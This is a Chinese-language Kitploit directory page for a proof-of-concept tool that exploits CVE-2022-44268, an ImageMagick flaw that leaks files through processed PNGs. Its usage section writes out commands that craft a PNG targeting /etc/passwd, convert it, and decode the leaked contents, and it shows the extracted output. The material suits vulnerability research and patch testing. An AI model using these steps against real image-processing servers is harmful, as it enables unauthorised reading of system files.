Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
imagemagick-lfi-poc — ImageMagick 本地文件包含 (LFI) 漏洞 PoC [CVE-2022-44268] | Kitploit
工具/GitHubGitHub/sybil-scan/imagemagick-lfi-poc
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试
GitHubsybil-scan/imagemagick-lfi-poc

imagemagick-lfi-poc

ImageMagick 本地文件包含 (LFI) 漏洞 PoC [CVE-2022-44268]

查看仓库
5392年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ImageMagick 本地文件包含 PoC [CVE-2022-44268]

MetabaseQ 的研究人员发现了 CVE-2022-44268,即 ImageMagick 7.1.0-49 存在信息泄露漏洞。当它解析 PNG 图像(例如用于调整大小)时,生成的图像中可能嵌入了任意远程文件的内容(前提是 ImageMagick 二进制文件具有读取该文件的权限)。

用法

  • 确保你已安装 ImageMagick 以及所需的 Python 包。
root@kitploit:~
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png
  • 转换生成的 PNG 文件:
root@kitploit:~
(~)>>> convert exploit.png result.png
  • 读取转换后 PNG 文件的内容:
root@kitploit:~
(~)>>> identify -verbose result.png
  • 解码 Raw profile type 字段中返回的数据,你将看到 /etc/passwd 的内容:
root@kitploit:~
(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

参考链接

  • https://www.metabaseq.com/imagemagick-zero-days/
  • https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
下载工具